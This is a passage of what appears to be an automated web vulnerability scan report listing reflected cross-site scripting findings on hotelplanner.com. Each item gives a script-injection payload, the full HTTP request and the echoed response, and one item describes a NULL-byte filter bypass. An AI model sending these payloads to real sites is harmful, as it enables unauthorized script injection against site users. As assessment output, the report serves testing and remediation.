Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The value of the hotelID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b8db"><script>alert(1)</script>33e3d0a441 was submitted in the hotelID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=1137917b8db"><script>alert(1)</script>33e3d0a441&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:31:40 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=1137917b8db"><script>alert(1)</script>33e3d0a441&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.248. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hrnQuoteKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The value of the hrnQuoteKey request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cef9"><script>alert(1)</script>d4ca531d628 was submitted in the hrnQuoteKey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab5cef9"><script>alert(1)</script>d4ca531d628 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:32:34 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 229760

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Hotel Availability - Millennium Bostonian Hotel Boston</title>
       <meta http-equiv="Content-Type" content="t
...[SNIP]...
onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab5cef9"><script>alert(1)</script>d4ca531d628', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.249. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [inDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The value of the inDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 685bb"><script>alert(1)</script>e49ec68931d was submitted in the inDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11685bb"><script>alert(1)</script>e49ec68931d&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:31:55 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 145136

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Hotel Availability - Millennium Bostonian Hotel Boston</title>
       <meta http-equiv="Content-Type" content="t
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11685bb"><script>alert(1)</script>e49ec68931d&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.250. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edca1"><script>alert(1)</script>e498f67dd89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab&edca1"><script>alert(1)</script>e498f67dd89=1 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:37:59 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 229787

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Hotel Availability - Millennium Bostonian Hotel Boston</title>
       <meta http-equiv="Content-Type" content="t
...[SNIP]...
onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab&edca1"><script>alert(1)</script>e498f67dd89=1', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.251. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [outDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The value of the outDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96e01"><script>alert(1)</script>2e9257ebae9 was submitted in the outDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/1196e01"><script>alert(1)</script>2e9257ebae9&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:32:01 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 145299

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Hotel Availability - Millennium Bostonian Hotel Boston</title>
       <meta http-equiv="Content-Type" content="t
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/1196e01"><script>alert(1)</script>2e9257ebae9&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.252. http://www.hotelplanner.com/Impressions.cfm [Ad_ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Impressions.cfm

Issue detail

The value of the Ad_ID request parameter is copied into an HTML comment. The payload bd524--><script>alert(1)</script>896a0a29026 was submitted in the Ad_ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /Impressions.cfm?Type=HotelPlannerAd&Ad_ID=16743bd524--><script>alert(1)</script>896a0a29026 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.1.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:15:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
===============================
Date: {ts '2011-10-02 19:15:45'}
==========================================================
Page: www.hotelplanner.com/Impressions.cfm?Type=HotelPlannerAd&Ad_ID=16743bd524--><script>alert(1)</script>896a0a29026
==========================================================

Browser: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
IP: 50.23.123
...[SNIP]...
4.253. http://www.hotelplanner.com/Impressions.cfm [Ad_ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Impressions.cfm

Issue detail

The value of the Ad_ID request parameter is copied into an HTML comment. The payload 6cb8c--><script>alert(1)</script>ec0a7626931 was submitted in the Ad_ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /Impressions.cfm?Type=HotelPlannerAd&Ad_ID=167436cb8c--><script>alert(1)</script>ec0a7626931 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; LANGUAGE=1; SOURCECODE=IGoUGo

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:10:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
===============================
Date: {ts '2011-10-02 19:10:26'}
==========================================================
Page: www.hotelplanner.com/Impressions.cfm?Type=HotelPlannerAd&Ad_ID=167436cb8c--><script>alert(1)</script>ec0a7626931
==========================================================

Browser: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
IP: 50.23.123
...[SNIP]...
4.254. http://www.hotelplanner.com/Impressions.cfm [Ad_ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Impressions.cfm

Issue detail

The value of the Ad_ID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74230"><script>alert(1)</script>48c0c0576c3 was submitted in the Ad_ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Impressions.cfm?Type=HotelPlannerAd&Ad_ID=1674374230"><script>alert(1)</script>48c0c0576c3 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; LANGUAGE=1; SOURCECODE=IGoUGo

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:10:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Impressions.cfm?Type=HotelPlannerAd&Ad_ID=1674374230"><script>alert(1)</script>48c0c0576c3', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.255. http://www.hotelplanner.com/Search/Index.cfm [City parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the City request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 653d4"><script>alert(1)</script>edda5ccddbf was submitted in the City parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Index.cfm?City=Boston653d4"><script>alert(1)</script>edda5ccddbf&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:12:15 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:12:15 GMT;path=/
Vary: Accept-Encoding
Content-Length: 190531


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/Index.cfm?City=Boston653d4"><script>alert(1)</script>edda5ccddbf&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.256. http://www.hotelplanner.com/Search/Index.cfm [Country parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the Country request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34479"><script>alert(1)</script>e1b66b11f67 was submitted in the Country parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States34479"><script>alert(1)</script>e1b66b11f67&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
